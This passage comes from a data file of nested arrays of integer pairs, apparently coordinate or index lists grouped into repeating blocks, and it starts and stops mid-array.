32],[ 5 , 33],[ 5 , 34],[ 5 , 35],[ 5 , 36],[ 5 , 37],[ 6 , 22],[ 6 , 23],[ 6 , 24],[ 6 , 25],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 6 , 35],[ 6 , 36],[ 6 , 37],[ 7 , 22],[ 7 , 23],[ 7 , 24],[ 7 , 25],[ 7 , 32],[ 7 , 33],[ 7 , 34],[ 7 , 35],[ 7 , 36],[ 7 , 37],[ 8 , 22],[ 8 , 26],[ 8 , 27],[ 8 , 28],[ 8 , 32],[ 8 , 33],[ 8 , 34],[ 8 , 38],[ 8 , 39],[ 8 , 40],[ 9 , 22],[ 9 , 26],[ 9 , 27],[ 9 , 28],[ 9 , 32],[ 9 , 33],[ 9 , 34],[ 9 , 38],[ 9 , 39],[ 9 , 40],[ 10 , 22],[ 10 , 26],[ 10 , 27],[ 10 , 28],[ 10 , 32],[ 10 , 33],[ 10 , 34],[ 10 , 38],[ 10 , 39],[ 10 , 40],[ 11 , 23],[ 11 , 26],[ 11 , 29],[ 11 , 30],[ 11 , 32],[ 11 , 35],[ 11 , 36],[ 11 , 38],[ 11 , 39],[ 11 , 41],[ 12 , 23],[ 12 , 26],[ 12 , 29],[ 12 , 30],[ 12 , 32],[ 12 , 35],[ 12 , 36],[ 12 , 38],[ 12 , 39],[ 12 , 41],[ 13 , 23],[ 13 , 26],[ 13 , 29],[ 13 , 30],[ 13 , 32],[ 13 , 35],[ 13 , 36],[ 13 , 38],[ 13 , 39],[ 13 , 41],[ 14 , 23],[ 14 , 26],[ 14 , 29],[ 14 , 30],[ 14 , 32],[ 14 , 35],[ 14 , 36],[ 14 , 38],[ 14 , 39],[ 14 , 41],[ 15 , 24],[ 15 , 27],[ 15 , 29],[ 15 , 31],[ 15 , 33],[ 15 , 35],[ 15 , 37],[ 15 , 38],[ 15 , 40],[ 15 , 41],[ 16 , 24],[ 16 , 27],[ 16 , 29],[ 16 , 31],[ 16 , 33],[ 16 , 35],[ 16 , 37],[ 16 , 38],[ 16 , 40],[ 16 , 41],[ 17 , 24],[ 17 , 27],[ 17 , 29],[ 17 , 31],[ 17 , 33],[ 17 , 35],[ 17 , 37],[ 17 , 38],[ 17 , 40],[ 17 , 41],[ 18 , 25],[ 18 , 28],[ 18 , 30],[ 18 , 31],[ 18 , 34],[ 18 , 36],[ 18 , 37],[ 18 , 39],[ 18 , 40],[ 18 , 41],[ 19 , 25],[ 19 , 28],[ 19 , 30],[ 19 , 31],[ 19 , 34],[ 19 , 36],[ 19 , 37],[ 19 , 39],[ 19 , 40],[ 19 , 41],[ 20 , 25],[ 20 , 28],[ 20 , 30],[ 20 , 31],[ 20 , 34],[ 20 , 36],[ 20 , 37],[ 20 , 39],[ 20 , 40],[ 20 , 41],[ 21 , 25],[ 21 , 28],[ 21 , 30],[ 21 , 31],[ 21 , 34],[ 21 , 36],[ 21 , 37],[ 21 , 39],[ 21 , 40],[ 21 , 41]],[ [1 , 18],[ 1 , 19],[ 1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 2 , 18],[ 2 , 19],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 3 , 18],[ 3 , 19],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 4 , 18],[ 4 , 19],[ 4 , 20],[ 4 , 21],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 5 , 18],[ 5 , 19],[ 5 , 20],[ 5 , 21],[ 5 , 28],[ 5 , 29],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 6 , 18],[ 6 , 19],[ 6 
, 20],[ 6 , 21],[ 6 , 28],[ 6 , 29],[ 6 , 30],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 7 , 18],[ 7 , 22],[ 7 , 23],[ 7 , 24],[ 7 , 28],[ 7 , 29],[ 7 , 30],[ 7 , 34],[ 7 , 35],[ 7 , 36],[ 8 , 19],[ 8 , 22],[ 8 , 25],[ 8 , 26],[ 8 , 28],[ 8 , 31],[ 8 , 32],[ 8 , 34],[ 8 , 35],[ 8 , 37],[ 9 , 19],[ 9 , 22],[ 9 , 25],[ 9 , 26],[ 9 , 28],[ 9 , 31],[ 9 , 32],[ 9 , 34],[ 9 , 35],[ 9 , 37],[ 10 , 19],[ 10 , 22],[ 10 , 25],[ 10 , 26],[ 10 , 28],[ 10 , 31],[ 10 , 32],[ 10 , 34],[ 10 , 35],[ 10 , 37],[ 11 , 19],[ 11 , 22],[ 11 , 25],[ 11 , 26],[ 11 , 28],[ 11 , 31],[ 11 , 32],[ 11 , 34],[ 11 , 35],[ 11 , 37],[ 12 , 20],[ 12 , 23],[ 12 , 25],[ 12 , 27],[ 12 , 29],[ 12 , 31],[ 12 , 33],[ 12 , 34],[ 12 , 36],[ 12 , 37],[ 13 , 20],[ 13 , 23],[ 13 , 25],[ 13 , 27],[ 13 , 29],[ 13 , 31],[ 13 , 33],[ 13 , 34],[ 13 , 36],[ 13 , 37],[ 14 , 20],[ 14 , 23],[ 14 , 25],[ 14 , 27],[ 14 , 29],[ 14 , 31],[ 14 , 33],[ 14 , 34],[ 14 , 36],[ 14 , 37],[ 15 , 21],[ 15 , 24],[ 15 , 26],[ 15 , 27],[ 15 , 30],[ 15 , 32],[ 15 , 33],[ 15 , 35],[ 15 , 36],[ 15 , 37],[ 16 , 21],[ 16 , 24],[ 16 , 26],[ 16 , 27],[ 16 , 30],[ 16 , 32],[ 16 , 33],[ 16 , 35],[ 16 , 36],[ 16 , 37],[ 17 , 21],[ 17 , 24],[ 17 , 26],[ 17 , 27],[ 17 , 30],[ 17 , 32],[ 17 , 33],[ 17 , 35],[ 17 , 36],[ 17 , 37]],[ [1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 1 , 30],[ 1 , 31],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 2 , 30],[ 2 , 31],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 3 , 30],[ 3 , 31],[ 4 , 22],[ 4 , 23],[ 4 , 24],[ 4 , 25],[ 4 , 26],[ 4 , 27],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 5 , 22],[ 5 , 23],[ 5 , 24],[ 5 , 25],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 5 , 35],[ 5 , 36],[ 5 , 37],[ 6 , 22],[ 6 , 23],[ 6 , 24],[ 6 , 25],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 6 , 35],[ 6 , 36],[ 6 , 37],[ 7 , 22],[ 7 , 23],[ 7 , 24],[ 7 , 25],[ 7 , 32],[ 7 , 33],[ 7 , 34],[ 7 , 35],[ 7 , 36],[ 7 , 37],[ 8 , 22],[ 8 , 23],[ 8 , 24],[ 8 , 25],[ 8 , 32],[ 8 , 33],[ 8 , 34],[ 8 , 35],[ 8 , 36],[ 8 , 37],[ 9 , 22],[ 9 , 26],[ 9 , 27],[ 9 , 28],[ 9 , 32],[ 9 , 33],[ 9 , 34],[ 9 , 38],[ 9 , 39],[ 9 , 40],[ 10 , 22],[ 10 , 26],[ 10 , 27],[ 10 , 28],[ 10 , 32],[ 10 , 33],[ 10 , 34],[ 10 , 38],[ 10 , 39],[ 10 , 40],[ 11 , 23],[ 11 , 26],[ 11 , 29],[ 11 , 30],[ 11 , 32],[ 11 , 35],[ 11 , 36],[ 11 , 38],[ 11 , 39],[ 11 , 41],[ 12 , 23],[ 12 , 26],[ 12 , 29],[ 12 , 30],[ 12 , 32],[ 12 , 35],[ 12 , 36],[ 12 , 38],[ 12 , 39],[ 12 , 41],[ 13 , 23],[ 13 , 26],[ 13 , 29],[ 13 , 30],[ 13 , 32],[ 13 , 35],[ 13 , 36],[ 13 , 38],[ 13 , 39],[ 13 , 41],[ 14 , 24],[ 14 , 27],[ 14 , 29],[ 14 , 31],[ 14 , 33],[ 14 , 35],[ 14 , 37],[ 14 , 38],[ 14 , 40],[ 14 , 41],[ 15 , 24],[ 15 , 27],[ 15 , 29],[ 15 , 31],[ 15 , 33],[ 15 , 35],[ 15 , 37],[ 15 , 38],[ 15 , 40],[ 15 , 41],[ 16 , 24],[ 16 , 27],[ 16 , 29],[ 16 , 31],[ 16 , 33],[ 16 , 35],[ 16 , 37],[ 16 , 38],[ 16 , 40],[ 16 , 41],[ 17 , 24],[ 17 , 27],[ 17 , 29],[ 17 , 31],[ 17 , 33],[ 17 , 35],[ 17 , 37],[ 17 , 38],[ 17 , 40],[ 17 , 41],[ 18 , 25],[ 18 , 28],[ 18 , 30],[ 18 , 31],[ 18 , 34],[ 18 , 36],[ 18 , 37],[ 18 , 39],[ 18 , 40],[ 18 , 41],[ 19 , 25],[ 19 , 28],[ 19 , 30],[ 19 , 31],[ 19 , 34],[ 19 , 36],[ 19 , 37],[ 19 , 39],[ 19 , 40],[ 19 , 41],[ 20 , 25],[ 20 , 28],[ 20 , 30],[ 20 , 31],[ 20 , 34],[ 20 , 36],[ 20 , 37],[ 20 , 39],[ 20 , 40],[ 20 , 41],[ 21 , 25],[ 21 , 28],[ 21 , 30],[ 21 , 31],[ 21 , 34],[ 21 , 36],[ 21 , 37],[ 21 , 39],[ 21 , 40],[ 21 , 41]],[ [1 , 18],[ 1 , 19],[ 1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 
, 25],[ 1 , 26],[ 1 , 27],[ 2 , 18],[ 2 , 19],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 3 , 18],[ 3 , 19],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 4 , 18],[ 4 , 19],[ 4 , 20],[ 4 , 21],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 5 , 18],[ 5 , 19],[ 5 , 20],[ 5 , 21],[ 5 , 28],[ 5 , 29],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 6 , 18],[ 6 , 22],[ 6 , 23],[ 6 , 24],[ 6 , 28],[ 6 , 29],[ 6 , 30],[ 6 , 34],[ 6 , 35],[ 6 , 36],[ 7 , 18],[ 7 , 22],[ 7 , 23],[ 7 , 24],[ 7 , 28],[ 7 , 29],[ 7 , 30],[ 7 , 34],[ 7 , 35],[ 7 , 36],[ 8 , 18],[ 8 , 22],[ 8 , 23],[ 8 , 24],[ 8 , 28],[ 8 , 29],[ 8 , 30],[ 8 , 34],[ 8 , 35],[ 8 , 36],[ 9 , 19],[ 9 , 22],[ 9 , 25],[ 9 , 26],[ 9 , 28],[ 9 , 31],[ 9 , 32],[ 9 , 34],[ 9 , 35],[ 9 , 37],[ 10 , 19],[ 10 , 22],[ 10 , 25],[ 10 , 26],[ 10 , 28],[ 10 , 31],[ 10 , 32],[ 10 , 34],[ 10 , 35],[ 10 , 37],[ 11 , 19],[ 11 , 22],[ 11 , 25],[ 11 , 26],[ 11 , 28],[ 11 , 31],[ 11 , 32],[ 11 , 34],[ 11 , 35],[ 11 , 37],[ 12 , 20],[ 12 , 23],[ 12 , 25],[ 12 , 27],[ 12 , 29],[ 12 , 31],[ 12 , 33],[ 12 , 34],[ 12 , 36],[ 12 , 37],[ 13 , 20],[ 13 , 23],[ 13 , 25],[ 13 , 27],[ 13 , 29],[ 13 , 31],[ 13 , 33],[ 13 , 34],[ 13 , 36],[ 13 , 37],[ 14 , 21],[ 14 , 24],[ 14 , 26],[ 14 , 27],[ 14 , 30],[ 14 , 32],[ 14 , 33],[ 14 , 35],[ 14 , 36],[ 14 , 37],[ 15 , 21],[ 15 , 24],[ 15 , 26],[ 15 , 27],[ 15 , 30],[ 15 , 32],[ 15 , 33],[ 15 , 35],[ 15 , 36],[ 15 , 37],[ 16 , 21],[ 16 , 24],[ 16 , 26],[ 16 , 27],[ 16 , 30],[ 16 , 32],[ 16 , 33],[ 16 , 35],[ 16 , 36],[ 16 , 37],[ 17 , 21],[ 17 , 24],[ 17 , 26],[ 17 , 27],[ 17 , 30],[ 17 , 32],[ 17 , 33],[ 17 , 35],[ 17 , 36],[ 17 , 37]],[ [1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 4 , 20],[ 4 , 21],[ 4 , 22],[ 4 , 23],[ 4 , 24],[ 4 , 25],[ 4 , 26],[ 4 , 27],[ 4 , 28],[ 4 , 29],[ 5 , 20],[ 5 , 21],[ 5 , 22],[ 5 , 23],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 5 , 35],[ 6 , 20],[ 6 , 21],[ 6 , 22],[ 6 , 23],[ 6 , 30],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 6 , 35],[ 7 , 20],[ 7 , 21],[ 7 , 22],[ 7 , 23],[ 7 , 30],[ 7 , 31],[ 7 , 32],[ 7 , 33],[ 7 , 34],[ 7 , 35],[ 8 , 20],[ 8 , 24],[ 8 , 25],[ 8 , 26],[ 8 , 30],[ 8 , 31],[ 8 , 32],[ 8 , 36],[ 8 , 37],[ 8 , 38],[ 9 , 20],[ 9 , 24],[ 9 , 25],[ 9 , 26],[ 9 , 30],[ 9 , 31],[ 9 , 32],[ 9 , 36],[ 9 , 37],[ 9 , 38],[ 10 , 20],[ 10 , 24],[ 10 , 25],[ 10 , 26],[ 10 , 30],[ 10 , 31],[ 10 , 32],[ 10 , 36],[ 10 , 37],[ 10 , 38],[ 11 , 21],[ 11 , 24],[ 11 , 27],[ 11 , 28],[ 11 , 30],[ 11 , 33],[ 11 , 34],[ 11 , 36],[ 11 , 37],[ 11 , 39],[ 12 , 21],[ 12 , 24],[ 12 , 27],[ 12 , 28],[ 12 , 30],[ 12 , 33],[ 12 , 34],[ 12 , 36],[ 12 , 37],[ 12 , 39],[ 13 , 21],[ 13 , 24],[ 13 , 27],[ 13 , 28],[ 13 , 30],[ 13 , 33],[ 13 , 34],[ 13 , 36],[ 13 , 37],[ 13 , 39],[ 14 , 22],[ 14 , 25],[ 14 , 27],[ 14 , 29],[ 14 , 31],[ 14 , 33],[ 14 , 35],[ 14 , 36],[ 14 , 38],[ 14 , 39],[ 15 , 22],[ 15 , 25],[ 15 , 27],[ 15 , 29],[ 15 , 31],[ 15 , 33],[ 15 , 35],[ 15 , 36],[ 15 , 38],[ 15 , 39],[ 16 , 22],[ 16 , 25],[ 16 , 27],[ 16 , 29],[ 16 , 31],[ 16 , 33],[ 16 , 35],[ 16 , 36],[ 16 , 38],[ 16 , 39],[ 17 , 23],[ 17 , 26],[ 17 , 28],[ 17 , 29],[ 17 , 32],[ 17 , 34],[ 17 , 35],[ 17 , 37],[ 17 , 38],[ 17 , 39],[ 18 , 23],[ 18 , 26],[ 18 , 28],[ 18 , 29],[ 18 , 32],[ 18 , 
34],[ 18 , 35],[ 18 , 37],[ 18 , 38],[ 18 , 39],[ 19 , 23],[ 19 , 26],[ 19 , 28],[ 19 , 29],[ 19 , 32],[ 19 , 34],[ 19 , 35],[ 19 , 37],[ 19 , 38],[ 19 , 39]],[ [1 , 19],[ 1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 2 , 19],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 3 , 19],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 4 , 19],[ 4 , 20],[ 4 , 21],[ 4 , 22],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 4 , 34],[ 5 , 19],[ 5 , 20],[ 5 , 21],[ 5 , 22],[ 5 , 29],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 6 , 19],[ 6 , 23],[ 6 , 24],[ 6 , 25],[ 6 , 29],[ 6 , 30],[ 6 , 31],[ 6 , 35],[ 6 , 36],[ 6 , 37],[ 7 , 19],[ 7 , 23],[ 7 , 24],[ 7 , 25],[ 7 , 29],[ 7 , 30],[ 7 , 31],[ 7 , 35],[ 7 , 36],[ 7 , 37],[ 8 , 19],[ 8 , 23],[ 8 , 24],[ 8 , 25],[ 8 , 29],[ 8 , 30],[ 8 , 31],[ 8 , 35],[ 8 , 36],[ 8 , 37],[ 9 , 20],[ 9 , 23],[ 9 , 26],[ 9 , 27],[ 9 , 29],[ 9 , 32],[ 9 , 33],[ 9 , 35],[ 9 , 36],[ 9 , 38],[ 10 , 20],[ 10 , 23],[ 10 , 26],[ 10 , 27],[ 10 , 29],[ 10 , 32],[ 10 , 33],[ 10 , 35],[ 10 , 36],[ 10 , 38],[ 11 , 20],[ 11 , 23],[ 11 , 26],[ 11 , 27],[ 11 , 29],[ 11 , 32],[ 11 , 33],[ 11 , 35],[ 11 , 36],[ 11 , 38],[ 12 , 21],[ 12 , 24],[ 12 , 26],[ 12 , 28],[ 12 , 30],[ 12 , 32],[ 12 , 34],[ 12 , 35],[ 12 , 37],[ 12 , 38],[ 13 , 21],[ 13 , 24],[ 13 , 26],[ 13 , 28],[ 13 , 30],[ 13 , 32],[ 13 , 34],[ 13 , 35],[ 13 , 37],[ 13 , 38],[ 14 , 21],[ 14 , 24],[ 14 , 26],[ 14 , 28],[ 14 , 30],[ 14 , 32],[ 14 , 34],[ 14 , 35],[ 14 , 37],[ 14 , 38],[ 15 , 22],[ 15 , 25],[ 15 , 27],[ 15 , 28],[ 15 , 31],[ 15 , 33],[ 15 , 34],[ 15 , 36],[ 15 , 37],[ 15 , 38],[ 16 , 22],[ 16 , 25],[ 16 , 27],[ 16 , 28],[ 16 , 31],[ 16 , 33],[ 16 , 34],[ 16 , 36],[ 16 , 37],[ 16 , 38],[ 17 , 22],[ 17 , 25],[ 17 , 27],[ 17 , 28],[ 17 , 31],[ 17 , 33],[ 17 , 34],[ 17 , 36],[ 17 , 37],[ 17 , 38],[ 18 , 22],[ 18 , 25],[ 18 , 27],[ 18 , 28],[ 18 , 31],[ 18 , 33],[ 18 , 34],[ 18 , 36],[ 18 , 37],[ 18 , 38]],[ [1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 4 , 20],[ 4 , 21],[ 4 , 22],[ 4 , 23],[ 4 , 24],[ 4 , 25],[ 4 , 26],[ 4 , 27],[ 4 , 28],[ 4 , 29],[ 5 , 20],[ 5 , 21],[ 5 , 22],[ 5 , 23],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 5 , 35],[ 6 , 20],[ 6 , 21],[ 6 , 22],[ 6 , 23],[ 6 , 30],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 6 , 35],[ 7 , 20],[ 7 , 24],[ 7 , 25],[ 7 , 26],[ 7 , 30],[ 7 , 31],[ 7 , 32],[ 7 , 36],[ 7 , 37],[ 7 , 38],[ 8 , 20],[ 8 , 24],[ 8 , 25],[ 8 , 26],[ 8 , 30],[ 8 , 31],[ 8 , 32],[ 8 , 36],[ 8 , 37],[ 8 , 38],[ 9 , 21],[ 9 , 24],[ 9 , 27],[ 9 , 28],[ 9 , 30],[ 9 , 33],[ 9 , 34],[ 9 , 36],[ 9 , 37],[ 9 , 39],[ 10 , 21],[ 10 , 24],[ 10 , 27],[ 10 , 28],[ 10 , 30],[ 10 , 33],[ 10 , 34],[ 10 , 36],[ 10 , 37],[ 10 , 39],[ 11 , 21],[ 11 , 24],[ 11 , 27],[ 11 , 28],[ 11 , 30],[ 11 , 33],[ 11 , 34],[ 11 , 36],[ 11 , 37],[ 11 , 39],[ 12 , 21],[ 12 , 24],[ 12 , 27],[ 12 , 28],[ 12 , 30],[ 12 , 33],[ 12 , 34],[ 12 , 36],[ 12 , 37],[ 12 , 39],[ 13 , 22],[ 13 , 25],[ 13 , 27],[ 13 , 29],[ 13 , 31],[ 13 , 33],[ 13 , 35],[ 13 , 36],[ 13 , 38],[ 13 , 39],[ 14 , 22],[ 14 , 25],[ 14 , 27],[ 14 , 29],[ 14 , 31],[ 14 , 33],[ 14 , 35],[ 14 , 36],[ 14 , 38],[ 14 , 39],[ 15 , 22],[ 15 , 25],[ 15 , 27],[ 15 , 29],[ 15 , 
31],[ 15 , 33],[ 15 , 35],[ 15 , 36],[ 15 , 38],[ 15 , 39],[ 16 , 22],[ 16 , 25],[ 16 , 27],[ 16 , 29],[ 16 , 31],[ 16 , 33],[ 16 , 35],[ 16 , 36],[ 16 , 38],[ 16 , 39],[ 17 , 23],[ 17 , 26],[ 17 , 28],[ 17 , 29],[ 17 , 32],[ 17 , 34],[ 17 , 35],[ 17 , 37],[ 17 , 38],[ 17 , 39],[ 18 , 23],[ 18 , 26],[ 18 , 28],[ 18 , 29],[ 18 , 32],[ 18 , 34],[ 18 , 35],[ 18 , 37],[ 18 , 38],[ 18 , 39],[ 19 , 23],[ 19 , 26],[ 19 , 28],[ 19 , 29],[ 19 , 32],[ 19 , 34],[ 19 , 35],[ 19 , 37],[ 19 , 38],[ 19 , 39]],[ [1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 4 , 20],[ 4 , 21],[ 4 , 22],[ 4 , 23],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 4 , 34],[ 4 , 35],[ 5 , 20],[ 5 , 21],[ 5 , 22],[ 5 , 23],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 5 , 35],[ 6 , 20],[ 6 , 24],[ 6 , 25],[ 6 , 26],[ 6 , 30],[ 6 , 31],[ 6 , 32],[ 6 , 36],[ 6 , 37],[ 6 , 38],[ 7 , 20],[ 7 , 24],[ 7 , 25],[ 7 , 26],[ 7 , 30],[ 7 , 31],[ 7 , 32],[ 7 , 36],[ 7 , 37],[ 7 , 38],[ 8 , 20],[ 8 , 24],[ 8 , 25],[ 8 , 26],[ 8 , 30],[ 8 , 31],[ 8 , 32],[ 8 , 36],[ 8 , 37],[ 8 , 38],[ 9 , 21],[ 9 , 24],[ 9 , 27],[ 9 , 28],[ 9 , 30],[ 9 , 33],[ 9 , 34],[ 9 , 36],[ 9 , 37],[ 9 , 39],[ 10 , 21],[ 10 , 24],[ 10 , 27],[ 10 , 28],[ 10 , 30],[ 10 , 33],[ 10 , 34],[ 10 , 36],[ 10 , 37],[ 10 , 39],[ 11 , 21],[ 11 , 24],[ 11 , 27],[ 11 , 28],[ 11 , 30],[ 11 , 33],[ 11 , 34],[ 11 , 36],[ 11 , 37],[ 11 , 39],[ 12 , 21],[ 12 , 24],[ 12 , 27],[ 12 , 28],[ 12 , 30],[ 12 , 33],[ 12 , 34],[ 12 , 36],[ 12 , 37],[ 12 , 39],[ 13 , 22],[ 13 , 25],[ 13 , 27],[ 13 , 29],[ 13 , 31],[ 13 , 33],[ 13 , 35],[ 13 , 36],[ 13 , 38],[ 13 , 39],[ 14 , 22],[ 14 , 25],[ 14 , 27],[ 14 , 29],[ 14 , 31],[ 14 , 33],[ 14 , 35],[ 14 , 36],[ 14 , 38],[ 14 , 39],[ 15 , 22],[ 15 , 25],[ 15 , 27],[ 15 , 29],[ 15 , 31],[ 15 , 33],[ 15 , 35],[ 15 , 36],[ 15 , 38],[ 15 , 39],[ 16 , 23],[ 16 , 26],[ 16 , 28],[ 16 , 29],[ 16 , 32],[ 16 , 34],[ 16 , 35],[ 16 , 37],[ 16 , 38],[ 16 , 39],[ 17 , 23],[ 17 , 26],[ 17 , 28],[ 17 , 29],[ 17 , 32],[ 17 , 34],[ 17 , 35],[ 17 , 37],[ 17 , 38],[ 17 , 39],[ 18 , 23],[ 18 , 26],[ 18 , 28],[ 18 , 29],[ 18 , 32],[ 18 , 34],[ 18 , 35],[ 18 , 37],[ 18 , 38],[ 18 , 39],[ 19 , 23],[ 19 , 26],[ 19 , 28],[ 19 , 29],[ 19 , 32],[ 19 , 34],[ 19 , 35],[ 19 , 37],[ 19 , 38],[ 19 , 39]],[ [1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 4 , 20],[ 4 , 21],[ 4 , 22],[ 4 , 23],[ 4 , 24],[ 4 , 25],[ 4 , 26],[ 4 , 27],[ 4 , 28],[ 4 , 29],[ 5 , 20],[ 5 , 21],[ 5 , 22],[ 5 , 23],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 5 , 35],[ 6 , 20],[ 6 , 21],[ 6 , 22],[ 6 , 23],[ 6 , 30],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 6 , 35],[ 7 , 20],[ 7 , 21],[ 7 , 22],[ 7 , 23],[ 7 , 30],[ 7 , 31],[ 7 , 32],[ 7 , 33],[ 7 , 34],[ 7 , 35],[ 8 , 20],[ 8 , 24],[ 8 , 25],[ 8 , 26],[ 8 , 30],[ 8 , 31],[ 8 , 32],[ 8 , 36],[ 8 , 37],[ 8 , 38],[ 9 , 20],[ 9 , 24],[ 9 , 25],[ 9 , 26],[ 9 , 30],[ 9 , 31],[ 9 , 32],[ 9 , 36],[ 9 , 37],[ 9 , 38],[ 10 , 20],[ 10 , 24],[ 10 , 25],[ 10 , 26],[ 10 , 30],[ 10 , 31],[ 10 , 32],[ 10 , 36],[ 10 , 37],[ 10 , 38],[ 11 , 21],[ 11 , 24],[ 11 , 27],[ 11 , 
28],[ 11 , 30],[ 11 , 33],[ 11 , 34],[ 11 , 36],[ 11 , 37],[ 11 , 39],[ 12 , 21],[ 12 , 24],[ 12 , 27],[ 12 , 28],[ 12 , 30],[ 12 , 33],[ 12 , 34],[ 12 , 36],[ 12 , 37],[ 12 , 39],[ 13 , 21],[ 13 , 24],[ 13 , 27],[ 13 , 28],[ 13 , 30],[ 13 , 33],[ 13 , 34],[ 13 , 36],[ 13 , 37],[ 13 , 39],[ 14 , 21],[ 14 , 24],[ 14 , 27],[ 14 , 28],[ 14 , 30],[ 14 , 33],[ 14 , 34],[ 14 , 36],[ 14 , 37],[ 14 , 39],[ 15 , 22],[ 15 , 25],[ 15 , 27],[ 15 , 29],[ 15 , 31],[ 15 , 33],[ 15 , 35],[ 15 , 36],[ 15 , 38],[ 15 , 39],[ 16 , 22],[ 16 , 25],[ 16 , 27],[ 16 , 29],[ 16 , 31],[ 16 , 33],[ 16 , 35],[ 16 , 36],[ 16 , 38],[ 16 , 39],[ 17 , 22],[ 17 , 25],[ 17 , 27],[ 17 , 29],[ 17 , 31],[ 17 , 33],[ 17 , 35],[ 17 , 36],[ 17 , 38],[ 17 , 39],[ 18 , 23],[ 18 , 26],[ 18 , 28],[ 18 , 29],[ 18 , 32],[ 18 , 34],[ 18 , 35],[ 18 , 37],[ 18 , 38],[ 18 , 39],[ 19 , 23],[ 19 , 26],[ 19 , 28],[ 19 , 29],[ 19 , 32],[ 19 , 34],[ 19 , 35],[ 19 , 37],[ 19 , 38],[ 19 , 39]],[ [1 , 17],[ 1 , 18],[ 1 , 19],[ 1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 